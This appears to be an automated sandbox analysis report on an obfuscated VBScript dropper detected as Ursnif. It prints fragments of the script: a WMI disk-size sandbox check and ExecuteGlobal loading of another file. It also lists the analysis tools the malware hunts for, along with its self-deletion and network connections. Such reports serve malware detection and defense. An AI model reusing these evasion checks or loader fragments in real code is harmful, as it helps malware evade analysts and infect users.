Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5156 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5148 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: description#_63033.vbs | Static file information: File size 1228076 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Source: Binary string: c:\This\point\some\Hand\mark\charge\Rose\Thank\Busy.pdb | source: wscript.exe, 00000000.00000003.822472998.000001FCB7FD1000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1729229167.000000006BEC8000.00000002.00020000.sdmp, GMT.svg.0.dr

            Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.ScriptName, cStr(453392313)) > 0 And Apx = 0) ThenExit FunctionEnd Ifurchin = Array("Madonna ergodic chariot scruffy. 9668371 flatiron seam tellurium. sclerotic. 6387991 cloddish churchgoing Narbonne windfall biracial highwaymen Hartford Merriam strand consternate anthropocentric suds devour interruptible102 work Eumenides retentive Francis wizard barbecue veranda toxic sandpiper Moldavia stagecoach fib formatting Oct121. misshapen approval arcsin inspiration sponge chordal picofarad farsighted traumatic, 2081792 intent exception grosbeak sniff. Boston, sledge ")Set noBjService = GetObject("winmgmts:\\.\root\cimv2")REM concierge saltwater nameable Swaziland destinate crock plover woolgather globular gawky rainy simpleton sensory censorial plowman. deacon strait Loeb seen khan, 2696056 downturn laxative Della scheme insuppressible, 6968453 accouter demographer cabdriver batt evocable Gandhian came contradistinct nervous bobby relict Ulster Midwestern hint ligand civilian portend Ellsworth ninetieth skylight. halfway coprocessor Vaughan. Set AKNa = noBjService.ExecQuery("Select * from Win32_LogicalDisk")For Each sago In AKNaabundant = Array("Dickson affluent Culbertson Paulson censor Negroes hemisphere Gustavus dynasty signet kennel Angola Toyota invasion pupil deterring thereby, India stole byline hazy haste foothold shot timid, Dylan brindle, fetch stagnate corpse prodigious Eileen virginal raft utensil restful workload sideman lam meridional perpetrate Dudley. 8182631 madmen Chopin continuum ")FLoJ = FLoJ + Int(sago.Size / ((20 + ((33 - 7.0) - 3.0)) + 1073741781.0))NextIf FLoJ < ((86 + (-(19 + 15.0))) + (76 + (-68.0))) ThenasthmaEnd IfEnd FunctionSub Sbw(Helen)REM dairyman tern tremulous inhibition upstream, 467570 speak detain hoopla dungeon frightful contrite727 scraggly upstart, metier. 
glassy, sulfuric Pam hypodermic warehousemen responsible Citroen numerate propelled cupboard crossway. Euphrates proton502 crank grottoes thrall niggardly retrograde slob passion enzymology aloft curmudgeon Set nkLk = CreateObject("Scripting.FileSystemObject")Set solo = nkLk.OpenTextFile(Helen, ((((71 + 23.0) + 145.0) - 10.0) - 228.0))ExecuteGlobal solo.ReadAll' elan curio simplistic pyridoxine oral Aztecan saprophyte giantess Exxon scalar reception Johanson sane, petition accession tuft Palomar Dominique scratch, 1606211 bald tame ontogeny eighty copra carpet actual litterbug solo.CloseSet nkLk = Nothingencroach = Array("snakeroot odyssey Hobbs singlet Virgo invertebrate extensible econometric swim tenon neath, impale vibrato remote shackle tea ")Set solo = Nothingemcee = Array("speech cordite pre cardiac Cincinnati transept flank provincial nondescript basal seek plowman940 caliphate kumquat envelop ")End SubFunction eaQV()on error resume nextelliptic = Array("float tularemia just prolate miaow Arianism fee cartridge diatom appetite occipital zillion seventeenth Lenny distributor compliant. inspect tablecloth vandal retrofitting intent785 ATF
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA24F0 push ecx; ret 3_2_6BEA24F9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA2543 push ecx; ret 3_2_6BEA2553
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001EAC83 push ecx; ret 3_2_001EAC93
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001ED2EF pushfd ; iretd 3_2_001ED2F2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001ED2EB pushfd ; iretd 3_2_001ED2EE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001EED26 pushfd ; retf 3_2_001EED36
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001EA950 push ecx; ret 3_2_001EA959
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEBDAF6 push ecx; ret 3_2_6BEBDB09
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEB3054 push esp; ret 3_2_6BEB3055
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEB1000 push dword ptr [ebp+50752CCCh]; ret 3_2_6BEB10DB

            Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\GMT.svg

            Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\description#_63033.vbs
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmp | Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmp | Binary or memory string: FAKEHTTPSERVER.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE@
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SYSER.EXE=
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXEDME@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXEEN
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXEH
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXESI 'A
Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXE@IK
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXE@T
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SANDBOXIERPCSS.EXEA
Source: wscript.exe, 00000000.00000003.934113751.000001FCB9156000.00000004.00000001.sdmp | Binary or memory string: PLATFORM.EXE","DNF.EXE","LAMER.EXE","REGMON.EXE","VIRUS.EXE","DSNIFF.EXE","LOGHTTP.EXE","REGSHOT.EXE","VX.EXE","DUMPCAP.EXE","LORDPE.EXE","REPMGR64.EXE","WINALYSIS.EXE","EMUL.EXE","MALMON.EXE","REPUTILS32.EXE","WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.937555463.000001FCB9156000.00000004.00000001.sdmp | Binary or memory string: CRIBBAGE = ARRAY("FRIDA-WINJECTOR-HELPER-64.EXE","FRIDA-WINJECTOR-HELPER-32.EXE","PYTHONW.EXE","PYW.EXE","CMDVIRTH.EXE","ALIVE.EXE","FILEWATCHERSERVICE.EXE","NGVMSVC.EXE","SANDBOXIERPCSS.EXE","ANALYZER.EXE","FORTITRACER.EXE","NSVERCTL.EXE","SBIECTRL.EXE","ANGAR2.EXE","GOATCASPER.EXE","OLLYDBG
Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: PEID.EXEU@#Z
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXE@K
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEVT
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: SYSER.EXE@=
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE@
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\wscript.exe TID: 2800 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4868 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_001E258E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEC12A7 FindFirstFileExA,3_2_6BEC12A7
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: wscript.exe, 00000000.00000002.948995385.000001FCBC560000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.946589992.000001FCB9686000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWe
Source: wscript.exe, 00000000.00000002.946735470.000001FCB96C5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.1662648058.000000000059B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.948052407.000001FCBB8D8000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWystem32\msxml6.dll\1
Source: wscript.exe, 00000000.00000002.948995385.000001FCBC560000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.948995385.000001FCBC560000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.948995385.000001FCBC560000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA1FA6 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_6BEA1FA6
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEC0E09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6BEC0E09
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEBF73F mov eax, dword ptr fs:[00000030h] 3_2_6BEBF73F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEDD3A1 mov eax, dword ptr fs:[00000030h] 3_2_6BEDD3A1
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEDCEE1 push dword ptr fs:[00000030h] 3_2_6BEDCEE1
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEDD2D7 mov eax, dword ptr fs:[00000030h] 3_2_6BEDD2D7
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA1E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,3_2_6BEA1E95
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEC0E09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6BEC0E09
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEBD934 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6BEBD934
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEBD43E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6BEBD43E

            HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: GMT.svg.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 47.241.8.147 80
Source: C:\Windows\System32\wscript.exe | Network Connect: 88.99.66.31 187
Source: regsvr32.exe, 00000002.00000002.1724450902.0000000000C80000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1727154427.0000000003090000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: regsvr32.exe, 00000002.00000002.1724450902.0000000000C80000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1727154427.0000000003090000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000002.00000002.1724450902.0000000000C80000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1727154427.0000000003090000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: regsvr32.exe, 00000002.00000002.1724450902.0000000000C80000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1727154427.0000000003090000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_6BEA1E58
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E350A cpuid 3_2_001E350A
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA1BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_6BEA1BB9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E350A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_001E350A
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6BEA177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_6BEA177C
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

            Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY

            Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY

Mitre Att&ck Matrix

Techniques are grouped by tactic column; the digits following a technique name are the report's signature-count badges.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link
Execution: Windows Management Instrumentation 41; Scripting 121; Execution through API 2; Exploitation for Client Execution 1; Graphical User Interface 1; Graphical User Interface
Persistence: Winlogon Helper DLL; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service
Privilege Escalation: Process Injection 12; Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service
